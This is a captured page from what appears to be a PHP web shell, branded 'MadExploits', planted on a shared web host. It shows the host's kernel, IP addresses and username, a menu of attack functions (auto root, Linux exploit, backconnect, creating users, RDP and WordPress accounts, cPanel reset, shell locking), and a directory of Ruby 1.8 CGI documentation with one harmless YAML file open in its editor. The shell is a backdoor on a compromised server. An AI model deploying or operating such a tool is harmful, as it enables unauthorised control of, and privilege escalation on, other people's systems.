Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby18 /
share /
ri /
1.8 /
system /
CGI /
[ HOME SHELL ]
Name
Size
Permission
Action
Cookie
[ DIR ]
drwxr-xr-x
Html3
[ DIR ]
drwxr-xr-x
Html4
[ DIR ]
drwxr-xr-x
Html4Fr
[ DIR ]
drwxr-xr-x
Html4Tr
[ DIR ]
drwxr-xr-x
HtmlExtension
[ DIR ]
drwxr-xr-x
QueryExtension
[ DIR ]
drwxr-xr-x
Session
[ DIR ]
drwxr-xr-x
TagMaker
[ DIR ]
drwxr-xr-x
cdesc-CGI.yaml
12.56
KB
-rw-r--r--
cookie-c.yaml
229
B
-rw-r--r--
env_table-i.yaml
170
B
-rw-r--r--
error-c.yaml
235
B
-rw-r--r--
escape-c.yaml
220
B
-rw-r--r--
escapeElement-c.yaml
1.08
KB
-rw-r--r--
escapeHTML-c.yaml
460
B
-rw-r--r--
header-c.yaml
231
B
-rw-r--r--
header-i.yaml
4.86
KB
-rw-r--r--
message-c.yaml
287
B
-rw-r--r--
new-c.yaml
1.3
KB
-rw-r--r--
out-i.yaml
2.05
KB
-rw-r--r--
parse-c.yaml
520
B
-rw-r--r--
pretty-c.yaml
823
B
-rw-r--r--
print-c.yaml
262
B
-rw-r--r--
print-i.yaml
395
B
-rw-r--r--
read_from_cmdline-i.yaml
276
B
-rw-r--r--
rfc1123_date-c.yaml
240
B
-rw-r--r--
stdinput-i.yaml
168
B
-rw-r--r--
stdoutput-i.yaml
170
B
-rw-r--r--
tag-c.yaml
355
B
-rw-r--r--
unescape-c.yaml
227
B
-rw-r--r--
unescapeElement-c.yaml
782
B
-rw-r--r--
unescapeHTML-c.yaml
462
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : out-i.yaml
--- !ruby/object:RI::MethodDescription aliases: [] block_params: "" comment: - !ruby/struct:SM::Flow::P body: Print an HTTP header and body to $DEFAULT_OUTPUT ($>) - !ruby/struct:SM::Flow::P body: "The header is provided by <tt>options</tt>, as for #header(). The body of the document is that returned by the passed- in block. This block takes no arguments. It is required." - !ruby/struct:SM::Flow::VERB body: " cgi = CGI.new\n cgi.out{ "string" }\n # Content-Type: text/html\n # Content-Length: 6\n #\n # string\n\n cgi.out("text/plain") { "string" }\n # Content-Type: text/plain\n # Content-Length: 6\n #\n # string\n\n cgi.out("nph" => true,\n "status" => "OK", # == "200 OK"\n "server" => ENV['SERVER_SOFTWARE'],\n "connection" => "close",\n "type" => "text/html",\n "charset" => "iso-2022-jp",\n # Content-Type: text/html; charset=iso-2022-jp\n "language" => "ja",\n "expires" => Time.now + (3600 * 24 * 30),\n "cookie" => [cookie1, cookie2],\n "my_header1" => "my_value",\n "my_header2" => "my_value") { "string" }\n" - !ruby/struct:SM::Flow::P body: Content-Length is automatically calculated from the size of the String returned by the content block. - !ruby/struct:SM::Flow::P body: If ENV['REQUEST_METHOD'] == "HEAD", then only the header is outputted (the content block is still required, but it is ignored). - !ruby/struct:SM::Flow::P body: If the charset is "iso-2022-jp" or "euc-jp" or "shift_jis" then the content is converted to this charset, and the language is set to "ja". full_name: CGI#out is_singleton: false name: out params: (options = "text/html") {|| ...} visibility: public
Close